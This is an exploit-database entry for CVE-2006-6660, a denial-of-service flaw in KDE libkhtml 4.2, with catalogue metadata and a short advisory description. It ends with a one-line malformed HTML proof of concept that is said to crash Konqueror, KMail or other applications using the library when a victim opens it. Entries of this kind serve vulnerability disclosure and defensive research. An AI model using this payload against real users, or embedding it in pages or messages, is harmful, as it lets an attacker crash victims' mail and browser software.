KDE LibkHTML 4.2 - NodeType Function Denial of Service
Author: Federico L. Bossi Bonin
type: dos
platform: linux
port:
date_added: 2006-12-19
date_updated: 2013-10-30
verified: 1
codes: CVE-2006-6660;OSVDB-35200
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/21662/info
KDE libkhtml is prone to a denial-of-service vulnerability.
This issue is triggered when an attacker convinces a victim user to open a malicious HTML document via an affected application such as kmail or Konqueror.
Remote attackers may exploit this issue to crash applications that use the affected library, effectively denying service to legitimate users.
<HTML> <HEAD> <RANGE <COL SPAN <>> <FRAMESET onload > </HEAD> </HTML>